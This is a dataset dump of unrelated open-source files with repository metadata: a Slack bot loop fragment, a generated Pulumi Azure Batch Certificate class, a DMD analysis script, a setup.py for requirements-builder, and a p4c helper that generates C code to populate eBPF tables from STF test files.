Read bot's user ID by calling Web API method `auth.test` otakuBotID = slack_client.api_call("auth.test")["user_id"] while True: try: command, channel,usr,stp = parseSlackInput(slack_client.rtm_read()) if command: handle_command(command, channel,usr,stp) except: pass schedule.run_pending() time.sleep(RTM_READ_DELAY) else: stdOut("Connection failed. Exception traceback printed above.")
27.631579
95
0.665063
230fb693f0a2df41ba867638cd3cd03a9e144d30
17,150
py
Python
sdk/python/pulumi_azure_native/batch/v20210601/certificate.py
polivbr/pulumi-azure-native
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
[ "Apache-2.0" ]
null
null
null
sdk/python/pulumi_azure_native/batch/v20210601/certificate.py
polivbr/pulumi-azure-native
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
[ "Apache-2.0" ]
null
null
null
sdk/python/pulumi_azure_native/batch/v20210601/certificate.py
polivbr/pulumi-azure-native
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from ... import _utilities from . import outputs from ._enums import * __all__ = ['CertificateArgs', 'Certificate'] @pulumi.input_type class CertificateArgs: def __init__(__self__, *, account_name: pulumi.Input[str], data: pulumi.Input[str], resource_group_name: pulumi.Input[str], certificate_name: Optional[pulumi.Input[str]] = None, format: Optional[pulumi.Input['CertificateFormat']] = None, password: Optional[pulumi.Input[str]] = None, thumbprint: Optional[pulumi.Input[str]] = None, thumbprint_algorithm: Optional[pulumi.Input[str]] = None): """ The set of arguments for constructing a Certificate resource. :param pulumi.Input[str] account_name: The name of the Batch account. :param pulumi.Input[str] data: The maximum size is 10KB. :param pulumi.Input[str] resource_group_name: The name of the resource group that contains the Batch account. :param pulumi.Input[str] certificate_name: The identifier for the certificate. This must be made up of algorithm and thumbprint separated by a dash, and must match the certificate data in the request. For example SHA1-a3d1c5. :param pulumi.Input['CertificateFormat'] format: The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx. :param pulumi.Input[str] password: This must not be specified if the certificate format is Cer. :param pulumi.Input[str] thumbprint: This must match the thumbprint from the name. :param pulumi.Input[str] thumbprint_algorithm: This must match the first portion of the certificate name. Currently required to be 'SHA1'. """ pulumi.set(__self__, "account_name", account_name) pulumi.set(__self__, "data", data) pulumi.set(__self__, "resource_group_name", resource_group_name) if certificate_name is not None: pulumi.set(__self__, "certificate_name", certificate_name) if format is not None: pulumi.set(__self__, "format", format) if password is not None: pulumi.set(__self__, "password", password) if thumbprint is not None: pulumi.set(__self__, "thumbprint", thumbprint) if thumbprint_algorithm is not None: pulumi.set(__self__, "thumbprint_algorithm", thumbprint_algorithm) @property @pulumi.getter(name="accountName") def account_name(self) -> pulumi.Input[str]: """ The name of the Batch account. """ return pulumi.get(self, "account_name") @account_name.setter def account_name(self, value: pulumi.Input[str]): pulumi.set(self, "account_name", value) @property @pulumi.getter def data(self) -> pulumi.Input[str]: """ The maximum size is 10KB. """ return pulumi.get(self, "data") @data.setter def data(self, value: pulumi.Input[str]): pulumi.set(self, "data", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Input[str]: """ The name of the resource group that contains the Batch account. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: pulumi.Input[str]): pulumi.set(self, "resource_group_name", value) @property @pulumi.getter(name="certificateName") def certificate_name(self) -> Optional[pulumi.Input[str]]: """ The identifier for the certificate. This must be made up of algorithm and thumbprint separated by a dash, and must match the certificate data in the request. For example SHA1-a3d1c5. """ return pulumi.get(self, "certificate_name") @certificate_name.setter def certificate_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "certificate_name", value) @property @pulumi.getter def format(self) -> Optional[pulumi.Input['CertificateFormat']]: """ The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx. """ return pulumi.get(self, "format") @format.setter def format(self, value: Optional[pulumi.Input['CertificateFormat']]): pulumi.set(self, "format", value) @property @pulumi.getter def password(self) -> Optional[pulumi.Input[str]]: """ This must not be specified if the certificate format is Cer. """ return pulumi.get(self, "password") @password.setter def password(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "password", value) @property @pulumi.getter def thumbprint(self) -> Optional[pulumi.Input[str]]: """ This must match the thumbprint from the name. """ return pulumi.get(self, "thumbprint") @thumbprint.setter def thumbprint(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "thumbprint", value) @property @pulumi.getter(name="thumbprintAlgorithm") def thumbprint_algorithm(self) -> Optional[pulumi.Input[str]]: """ This must match the first portion of the certificate name. Currently required to be 'SHA1'. """ return pulumi.get(self, "thumbprint_algorithm") @thumbprint_algorithm.setter def thumbprint_algorithm(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "thumbprint_algorithm", value) class Certificate(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, account_name: Optional[pulumi.Input[str]] = None, certificate_name: Optional[pulumi.Input[str]] = None, data: Optional[pulumi.Input[str]] = None, format: Optional[pulumi.Input['CertificateFormat']] = None, password: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, thumbprint: Optional[pulumi.Input[str]] = None, thumbprint_algorithm: Optional[pulumi.Input[str]] = None, __props__=None): """ Contains information about a certificate. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] account_name: The name of the Batch account. :param pulumi.Input[str] certificate_name: The identifier for the certificate. This must be made up of algorithm and thumbprint separated by a dash, and must match the certificate data in the request. For example SHA1-a3d1c5. :param pulumi.Input[str] data: The maximum size is 10KB. :param pulumi.Input['CertificateFormat'] format: The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx. :param pulumi.Input[str] password: This must not be specified if the certificate format is Cer. :param pulumi.Input[str] resource_group_name: The name of the resource group that contains the Batch account. :param pulumi.Input[str] thumbprint: This must match the thumbprint from the name. :param pulumi.Input[str] thumbprint_algorithm: This must match the first portion of the certificate name. Currently required to be 'SHA1'. """ ... @overload def __init__(__self__, resource_name: str, args: CertificateArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Contains information about a certificate. :param str resource_name: The name of the resource. :param CertificateArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(CertificateArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, account_name: Optional[pulumi.Input[str]] = None, certificate_name: Optional[pulumi.Input[str]] = None, data: Optional[pulumi.Input[str]] = None, format: Optional[pulumi.Input['CertificateFormat']] = None, password: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, thumbprint: Optional[pulumi.Input[str]] = None, thumbprint_algorithm: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = CertificateArgs.__new__(CertificateArgs) if account_name is None and not opts.urn: raise TypeError("Missing required property 'account_name'") __props__.__dict__["account_name"] = account_name __props__.__dict__["certificate_name"] = certificate_name if data is None and not opts.urn: raise TypeError("Missing required property 'data'") __props__.__dict__["data"] = data __props__.__dict__["format"] = format __props__.__dict__["password"] = password if resource_group_name is None and not opts.urn: raise TypeError("Missing required property 'resource_group_name'") __props__.__dict__["resource_group_name"] = resource_group_name __props__.__dict__["thumbprint"] = thumbprint __props__.__dict__["thumbprint_algorithm"] = thumbprint_algorithm __props__.__dict__["delete_certificate_error"] = None __props__.__dict__["etag"] = None __props__.__dict__["name"] = None __props__.__dict__["previous_provisioning_state"] = None __props__.__dict__["previous_provisioning_state_transition_time"] = None __props__.__dict__["provisioning_state"] = None __props__.__dict__["provisioning_state_transition_time"] = None __props__.__dict__["public_data"] = None __props__.__dict__["type"] = None alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:batch/v20210601:Certificate"), pulumi.Alias(type_="azure-native:batch:Certificate"), pulumi.Alias(type_="azure-nextgen:batch:Certificate"), pulumi.Alias(type_="azure-native:batch/v20170901:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20170901:Certificate"), pulumi.Alias(type_="azure-native:batch/v20181201:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20181201:Certificate"), pulumi.Alias(type_="azure-native:batch/v20190401:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20190401:Certificate"), pulumi.Alias(type_="azure-native:batch/v20190801:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20190801:Certificate"), pulumi.Alias(type_="azure-native:batch/v20200301:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20200301:Certificate"), pulumi.Alias(type_="azure-native:batch/v20200501:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20200501:Certificate"), pulumi.Alias(type_="azure-native:batch/v20200901:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20200901:Certificate"), pulumi.Alias(type_="azure-native:batch/v20210101:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20210101:Certificate")]) opts = pulumi.ResourceOptions.merge(opts, alias_opts) super(Certificate, __self__).__init__( 'azure-native:batch/v20210601:Certificate', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None) -> 'Certificate': """ Get an existing Certificate resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = CertificateArgs.__new__(CertificateArgs) __props__.__dict__["delete_certificate_error"] = None __props__.__dict__["etag"] = None __props__.__dict__["format"] = None __props__.__dict__["name"] = None __props__.__dict__["previous_provisioning_state"] = None __props__.__dict__["previous_provisioning_state_transition_time"] = None __props__.__dict__["provisioning_state"] = None __props__.__dict__["provisioning_state_transition_time"] = None __props__.__dict__["public_data"] = None __props__.__dict__["thumbprint"] = None __props__.__dict__["thumbprint_algorithm"] = None __props__.__dict__["type"] = None return Certificate(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="deleteCertificateError") def delete_certificate_error(self) -> pulumi.Output['outputs.DeleteCertificateErrorResponse']: """ This is only returned when the certificate provisioningState is 'Failed'. """ return pulumi.get(self, "delete_certificate_error") @property @pulumi.getter def etag(self) -> pulumi.Output[str]: """ The ETag of the resource, used for concurrency statements. """ return pulumi.get(self, "etag") @property @pulumi.getter def format(self) -> pulumi.Output[Optional[str]]: """ The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx. """ return pulumi.get(self, "format") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the resource. """ return pulumi.get(self, "name") @property @pulumi.getter(name="previousProvisioningState") def previous_provisioning_state(self) -> pulumi.Output[str]: """ The previous provisioned state of the resource """ return pulumi.get(self, "previous_provisioning_state") @property @pulumi.getter(name="previousProvisioningStateTransitionTime") def previous_provisioning_state_transition_time(self) -> pulumi.Output[str]: return pulumi.get(self, "previous_provisioning_state_transition_time") @property @pulumi.getter(name="provisioningState") def provisioning_state(self) -> pulumi.Output[str]: return pulumi.get(self, "provisioning_state") @property @pulumi.getter(name="provisioningStateTransitionTime") def provisioning_state_transition_time(self) -> pulumi.Output[str]: return pulumi.get(self, "provisioning_state_transition_time") @property @pulumi.getter(name="publicData") def public_data(self) -> pulumi.Output[str]: """ The public key of the certificate. """ return pulumi.get(self, "public_data") @property @pulumi.getter def thumbprint(self) -> pulumi.Output[Optional[str]]: """ This must match the thumbprint from the name. """ return pulumi.get(self, "thumbprint") @property @pulumi.getter(name="thumbprintAlgorithm") def thumbprint_algorithm(self) -> pulumi.Output[Optional[str]]: """ This must match the first portion of the certificate name. Currently required to be 'SHA1'. """ return pulumi.get(self, "thumbprint_algorithm") @property @pulumi.getter def type(self) -> pulumi.Output[str]: """ The type of the resource. """ return pulumi.get(self, "type")
46.603261
1,259
0.662915
35daad5aecd0ac3a78c0c2339cbf51e0014f3f74
9,264
py
Python
RunSEAmodes.py
PapStatMechMat/SeaPy
1b30792c011a23172a1ce33fe8ebea976561d59a
[ "BSD-2-Clause" ]
1
2021-05-26T05:16:05.000Z
2021-05-26T05:16:05.000Z
RunSEAmodes.py
PapStatMechMat/SeaPy
1b30792c011a23172a1ce33fe8ebea976561d59a
[ "BSD-2-Clause" ]
null
null
null
RunSEAmodes.py
PapStatMechMat/SeaPy
1b30792c011a23172a1ce33fe8ebea976561d59a
[ "BSD-2-Clause" ]
null
null
null
import numpy as np import matplotlib as mpl import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D from numpy import dot, multiply, diag, power,ones,average from scipy.signal import convolve2d from numpy import pi, exp, sin, cos, cosh, tanh, real, imag from numpy.linalg import inv, eig, pinv from scipy.linalg import svd, svdvals from scipy.integrate import odeint, ode, complex_ode from warnings import warn import glob,sys,os from scipy import array,log2,shape, argsort,loadtxt from numpy.lib.stride_tricks import as_strided as ast from itertools import product Rfactor=1 inc_full0=200 inc_test0=140 num_pred=20 import matplotlib as mpl import numpy as np from scipy.stats import gaussian_kde mpl.rc('lines', linewidth=1, color='black') mpl.rc('font', size=20,family='serif') mpl.rc('text',color='black') mpl.rcParams['xtick.major.size']=16 mpl.rcParams['xtick.minor.size']=10 mpl.rcParams['xtick.labelsize']=20 mpl.rcParams['ytick.labelsize']=20 mpl.rcParams['ytick.major.size']=16 mpl.rcParams['ytick.minor.size']=10 mpl.rcParams['grid.linewidth']=2.0 mpl.rcParams['axes.labelsize']=28 mpl.rcParams['legend.fontsize']=20 mpl.rcParams['savefig.dpi']=250 mtype=['o','s','>','<','^','v','p','*','h','D','x','H','.'] ltype=['-','--','-.','-','--','-.','--','-','-.'] col=['b','g','r','c','m','y','brown','cyan','black'] G=1e11 def DislocationState(f): A=loadtxt(f) strain_zz=A.copy() sigma_zz =A.copy() * G return strain_zz, sigma_zz,shape(A) def Make2DImageField(z,inc): fig=plt.figure() ax1=fig.add_subplot(111) mpb=ax1.imshow(z) plt.axis('off') ax1.set_yticklabels([]) ax1.set_xticklabels([]) #colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8]) fig.colorbar(mpb) fig.savefig('O_SEA_damage_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True) return fig,ax1 def Make2DImageSigma(z,inc): fig=plt.figure() ax1=fig.add_subplot(111) mpb=ax1.imshow(z) plt.axis('off') ax1.set_yticklabels([]) ax1.set_xticklabels([]) #colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8]) fig.colorbar(mpb) fig.savefig('O_SEA_sigma_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True) return fig,ax1 def Make2DImageStrain(z,inc): fig=plt.figure() ax1=fig.add_subplot(111) mpb=ax1.imshow(z) plt.axis('off') ax1.set_yticklabels([]) ax1.set_xticklabels([]) #colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8]) fig.colorbar(mpb) fig.savefig('O_SEA_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True) return fig,ax1 def Make2DImageTexture(z,inc): fig=plt.figure() ax1=fig.add_subplot(111) from matplotlib import cm mpb=ax1.imshow(z*10,cmap=cm.gist_ncar,alpha=0.9) plt.axis('off') ax1.set_yticklabels([]) ax1.set_xticklabels([]) #colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8]) #fig.colorbar(mpb) fig.savefig('O_SEA_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True) return fig,ax1 def MakeStressStrainPlot(s_test, e_test, s_full, e_full, e_pred , inc): fig=plt.figure() ax=fig.add_subplot(111) ax.plot(e_test, s_test, 's',c='blue',alpha=0.75) axt=ax.twinx() #axt.plot(e_test, d_test, 's',c='red' ,alpha=0.75) ax.plot(e_full, s_full, '-' ,c='blue') #axt.plot(e_full, d_full, '-',c='maroon',lw=1) #ax.plot(e_full, d_full, '-',c='maroon',lw=1,alpha=0.45,label=' ') #axt.plot(e_pred, d_pred, '--',c='purple',lw=3,alpha=0.75) ax.plot([0], [0], '--',c='purple',lw=3,alpha=0.75,label=' ') #from signalsmooth import smooth w0=35 e_pred2=e_full #smooth(e_full,window_len=w0) #print len(e_pred2) s_pred2=s_full #smooth(s_full,window_len=w0) #d_pred2=smooth(d_full,window_len=w0) print(len(s_pred2)) ax.plot([0], [0], '-',c='red',lw=5,alpha=0.4,label=' ') ax.plot(e_pred2, s_pred2, '-',c='navy',lw=5,alpha=0.5,label=' ') #axt.plot(e_pred2, 0.95*d_pred2, '-',c='red',lw=5,alpha=0.5) ax.set_xlabel(r'$\langle\epsilon\rangle$') ax.set_ylabel(r'$\langle \sigma_{zz}\rangle$'+'(MPa)') axt.set_ylabel(r'$\langle I_{1}^{(\epsilon)}\rangle$') """ ax.set_xlim((0.0,0.0012)) axt.set_ylim(bottom=-0.005) axt.set_xlim((0.0,0.0012)) ax.set_ylim(bottom=-0.5) """ #ax.set_xticks(ax.get_xticks()[::2]) axt.spines['right'].set_color('red') axt.yaxis.label.set_color('red') axt.tick_params(axis='y', colors='red') ax.spines['left'].set_color('blue') ax.yaxis.label.set_color('blue') l=ax.legend(loc='upper left') l.draw_frame(False) #l=axt.legend(loc='upper left', bbox_to_anchor=(0., 0.)) #l.draw_frame(False) ax.tick_params(axis='y', colors='blue') fig.savefig('O_SEA_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True) #plt.show() return fig , ax , axt def BuildDataMatrix(Dms): return Dms def Energy(p): e=array([sum(p[i,:] * p[i,:]) for i in range(len(p[:,0]))]) return e def MakeImage(P,col,s1,outd): fig41=plt.figure() ax41=fig41.add_subplot(111) print(col,s1,'makeImage') p0=P[:,col].reshape(s1) #p0=Energy(p).reshape(s1) rp0=real(p0) mpb=plt.imshow(rp0/max(rp0.flatten())) #plt.clim(0,1e5) # For dislocation examples plt.axis('off') ax41.set_yticklabels([]) ax41.set_xticklabels([]) sc=str(col) # fig41.savefig(outd+'/O_'+sc+'th-InvariantMode_NoCBar.png',bbox_inches='tight', pad_inches = 0, transparent=True) plt.colorbar(mpb)#,extend='both') fig41.savefig(outd+'/O_SEA_'+sc+'th-InvariantMode.png',bbox_inches='tight', pad_inches = 0, transparent=True) #plt.title(sc+'-th Damage Mode') #fig=plt.figure() #ax=fig.add_subplot(111) #colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8]) #fig.colorbar(mpb) return None def MakeImagePred(P,col,s1,eps,outd): fig41=plt.figure() ax41=fig41.add_subplot(111) p=P.reshape(s1) sav=real(p.flatten().mean()) p0=p #Energy(p).reshape(s1) rp0=real(p0) print(rp0.flatten().mean(),rp0.flatten().max()) mpb=plt.imshow(rp0) plt.clim(-.1,.1) plt.axis('off') ax41.set_yticklabels([]) ax41.set_xticklabels([]) sc=str(format(eps,'.0e'))[:] #fig41.savefig('O_'+sc+'th-StepInvariant.png',bbox_inches='tight', pad_inches = 0, transparent=True) plt.colorbar(mpb)#,extend='both') fig41.savefig(outd+'/O_SEA_'+sc+'th-StepStrainInvariant_WithCbar.png',bbox_inches='tight', pad_inches = 0, transparent=True) #plt.title(' Damage Field '+r'$\phi$'+' at '+r'$\epsilon=$'+sc) return sav def MakePlot_SV(Sig,r,outd): ####Plotting fig2=plt.figure() ax2=fig2.add_subplot(111) ax2.plot(Sig,'s',markersize=20) ax2.set_xlabel('index '+r'$j$') ax2.set_ylabel(r'$\varsigma_j$') ax2.set_xlim((-0.2,r)) fig2.tight_layout() fig2.savefig(outd+'/O_SEA_SV.png',bbox_inches='tight', pad_inches = 0, transparent=True) ############ return fig2,ax2 def MakePlot_Eigen(mu,outd): t0 = np.linspace(0, 2*pi, 20) fig3=plt.figure() ax3=fig3.add_subplot(111) ax3.plot(real(mu),imag(mu),'s',markersize=20) ax3.plot(cos(t0), sin(t0),'--') ax3.set_xlabel(r'$Re(\mu)$') ax3.set_ylabel(r'$Im(\mu)$') fig3.tight_layout() fig3.savefig(outd+'/O_SEA_Eigen.png',bbox_inches='tight', pad_inches = 0, transparent=True) return fig3,ax3,t0 def Predict(Phi,b,mu,s,t,r,outd): print(t,'--t') dt=t[1]-t[0] tmin=min(t) tmax=max(t) t2 = np.linspace(tmin, tmax, num_pred) Psi = np.zeros([r, len(t2)], dtype='complex') for i,_x in enumerate(t2): print(_x,'_x') print(b,'b') print(i) print(shape(Psi)) Psi[:,i] = multiply(power(mu, _x/dt), b) # compute DMD reconstruction D2 = dot(Phi, Psi) #np.allclose(D, D2) # True sigmaps=[] tps=[] for i in range(len(D2[0,:])): print(str(i)+'--predicted...'+str(t2[i])) F=D2[:,i] if i==0: #subtract background F0=average(F) eps=t2[i] sigma=MakeImagePred((F-F0),i,s,eps,outd) tps.append(t2[i]) sigmaps.append(sigma+eps) return tps,sigmaps def Perform_and_PredictFuture(D0,eps,s,outd): D=D0.T #Data Matrix X=D[:,:-1] Y=D[:,1:] # SVD of input matrix U2,Sig2,Vh2 = svd(X, False) r = 5 # rank-5 truncation fig_SV,ax_SV=MakePlot_SV(Sig2,r,outd) U = U2[:,:r] Sig = diag(Sig2)[:r,:r] V = Vh2.conj().T[:,:r] # build A tilde Atil = dot(dot(dot(U.conj().T, Y), V), inv(Sig)) mu,W = eig(Atil) fig_Eigen,ax_Eigen,t0=MakePlot_Eigen(mu,outd) # build DMD modes Phi = dot(dot(dot(Y, V), inv(Sig)), W) MakeImage(Phi,0,s,outd) MakeImage(Phi,1,s,outd) MakeImage(Phi,2,s,outd) MakeImage(Phi,3,s,outd) # compute time evolution b = dot(pinv(Phi), X[:,1]) tps,sigmaps=Predict(Phi,b,mu,s,eps,r,outd) return tps,sigmaps
33.323741
128
0.614961
1f3fcca34de84aa8bf6265a50647d694d96fc92e
2,475
py
Python
setup.py
cclauss/requirements-builder
ec2e84b974290aaefa71b5ce19d0c343d29efffa
[ "BSD-3-Clause" ]
null
null
null
setup.py
cclauss/requirements-builder
ec2e84b974290aaefa71b5ce19d0c343d29efffa
[ "BSD-3-Clause" ]
null
null
null
setup.py
cclauss/requirements-builder
ec2e84b974290aaefa71b5ce19d0c343d29efffa
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # # This file is part of Requirements-Builder # Copyright (C) 2015, 2016, 2017, 2018 CERN. # # Requirements-Builder is free software; you can redistribute it and/or # modify it under the terms of the Revised BSD License; see LICENSE # file for more details. # """Build requirements files from setup.py requirements.""" import os from setuptools import setup # Get the version string. Cannot be done with import! g = {} with open(os.path.join('requirements_builder', 'version.py'), 'rt') as fp: exec(fp.read(), g) version = g['__version__'] with open('README.rst') as readme_file: readme = readme_file.read() with open('CHANGES.rst') as history_file: history = history_file.read().replace('.. :changes:', '') install_requires = [ 'click>=6.1.0', 'mock>=1.3.0', ] tests_require = [ 'check-manifest>=0.25', 'coverage>=4.0', 'isort>=4.0.0', 'pydocstyle>=1.0.0', 'pytest-cache>=1.0', 'pytest-cov>=2.0.0', 'pytest-pep8>=1.0.6', 'pytest>=2.8.0', ] extras_require = { 'docs': [ 'Sphinx<1.5.0,>=1.4.2', 'docutils<0.13,>=0.12', ], 'tests': tests_require, } extras_require['all'] = extras_require['tests'] + extras_require['docs'] setup_requires = ['pytest-runner>=2.6.2', ] setup( name='requirements-builder', version=version, description=__doc__, long_description=readme + '\n\n' + history, author="Invenio Collaboration", author_email='info@inveniosoftware.org', url='https://github.com/inveniosoftware/requirements-builder', entry_points={ 'console_scripts': ["requirements-builder = requirements_builder.cli:cli"] }, packages=['requirements_builder', ], include_package_data=True, extras_require=extras_require, install_requires=install_requires, setup_requires=setup_requires, tests_require=tests_require, license='BSD', zip_safe=False, keywords='requirements-builder', classifiers=[ 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Natural Language :: English', "Programming Language :: Python :: 2", 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', ], )
27.5
74
0.63596
2666542ec3037f792e3650bf4b928959ac13f8c9
5,743
py
Python
backends/ebpf/targets/ebpfstf.py
Abe149/p4c
4a40ce4a15957de76e3a161c3778f1f0b6ac5780
[ "Apache-2.0" ]
null
null
null
backends/ebpf/targets/ebpfstf.py
Abe149/p4c
4a40ce4a15957de76e3a161c3778f1f0b6ac5780
[ "Apache-2.0" ]
null
null
null
backends/ebpf/targets/ebpfstf.py
Abe149/p4c
4a40ce4a15957de76e3a161c3778f1f0b6ac5780
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 # Copyright 2018 VMware, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Converts the commands in an stf file which populate tables into a C program that manipulates ebpf tables. """ import os import sys sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + '/../../tools') from testutils import * from stf.stf_parser import STFParser class eBPFCommand(object): """ Defines a match-action command for eBPF programs""" def __init__(self, a_type, table, action, priority="", match=[], extra=""): self.a_type = a_type # dir in which all files are stored self.table = table # contains meta information self.action = action # contains meta information self.priority = priority # template to generate a filter self.match = match # contains standard and error output self.extra = extra # could also be "pcapng" def _generate_control_actions(cmds): """ Generates the actual control plane commands. This function inserts C code for all the "add" commands that have been parsed. """ generated = "" for index, cmd in enumerate(cmds): key_name = "key_%s%d" % (cmd.table, index) value_name = "value_%s%d" % (cmd.table, index) if cmd.a_type == "setdefault": tbl_name = cmd.table + "_defaultAction" generated += "u32 %s = 0;\n\t" % (key_name) else: generated += "struct %s_key %s = {};\n\t" % (cmd.table, key_name) tbl_name = cmd.table for key_num, key_field in enumerate(cmd.match): field = key_field[0].split('.')[1] generated += ("%s.%s = %s;\n\t" % (key_name, field, key_field[1])) generated += ("tableFileDescriptor = " "BPF_OBJ_GET(MAP_PATH \"/%s\");\n\t" % tbl_name) generated += ("if (tableFileDescriptor < 0) {" "fprintf(stderr, \"map %s not loaded\");" " exit(1); }\n\t" % tbl_name) generated += ("struct %s_value %s = {\n\t\t" % ( cmd.table, value_name)) if cmd.action[0] == "_NoAction": generated += ".action = 0,\n\t\t" else: action_full_name = "{}_ACT_{}".format(cmd.table.upper(), cmd.action[0].upper()) generated += ".action = %s,\n\t\t" % action_full_name generated += ".u = {.%s = {" % cmd.action[0] for val_num, val_field in enumerate(cmd.action[1]): generated += "%s," % val_field[1] generated += "}},\n\t" generated += "};\n\t" generated += ("ok = BPF_USER_MAP_UPDATE_ELEM" "(tableFileDescriptor, &%s, &%s, BPF_ANY);\n\t" % (key_name, value_name)) generated += ("if (ok != 0) { perror(\"Could not write in %s\");" "exit(1); }\n" % tbl_name) return generated def create_table_file(actions, tmpdir, file_name): """ Create the control plane file. The control commands are provided by the stf parser. This generated file is required by ebpf_runtime.c to initialize the control plane. """ err = "" try: with open(tmpdir + "/" + file_name, "w+") as control_file: control_file.write("#include \"test.h\"\n\n") control_file.write("static inline void setup_control_plane() {") control_file.write("\n\t") control_file.write("int ok;\n\t") control_file.write("int tableFileDescriptor;\n\t") generated_cmds = _generate_control_actions(actions) control_file.write(generated_cmds) control_file.write("}\n") except OSError as e: err = e return FAILURE, err return SUCCESS, err def parse_stf_file(raw_stf): """ Uses the .stf parsing tool to acquire a pre-formatted list. Processing entries according to their specified cmd. """ parser = STFParser() stf_str = raw_stf.read() stf_map, errs = parser.parse(stf_str) input_pkts = {} cmds = [] expected = {} for stf_entry in stf_map: if stf_entry[0] == "packet": input_pkts.setdefault(stf_entry[1], []).append(bytes.fromhex(''.join(stf_entry[2].split()))) elif stf_entry[0] == "expect": interface = int(stf_entry[1]) pkt_data = stf_entry[2] expected.setdefault(interface, {}) if pkt_data != '': expected[interface]["any"] = False expected[interface].setdefault( "pkts", []).append(pkt_data) else: expected[interface]["any"] = True elif stf_entry[0] == "add": cmd = eBPFCommand( a_type=stf_entry[0], table=stf_entry[1], priority=stf_entry[2], match=stf_entry[3], action=stf_entry[4], extra=stf_entry[5]) cmds.append(cmd) elif stf_entry[0] == "setdefault": cmd = eBPFCommand( a_type=stf_entry[0], table=stf_entry[1], action=stf_entry[2]) cmds.append(cmd) return input_pkts, cmds, expected
41.615942
104
0.58001
2a77aa3a4fd9eea90d9ccee3698d69828f3f2a0c
11,685
py
Python
mtcar-lossgraph/mountaincar-solver-lossgraph.py
hushon/son-dqn
08b9bdce8b570a629b8484d21b06146335f5907e
[ "Apache-2.0" ]
null
null
null
mtcar-lossgraph/mountaincar-solver-lossgraph.py
hushon/son-dqn
08b9bdce8b570a629b8484d21b06146335f5907e
[ "Apache-2.0" ]
null
null
null
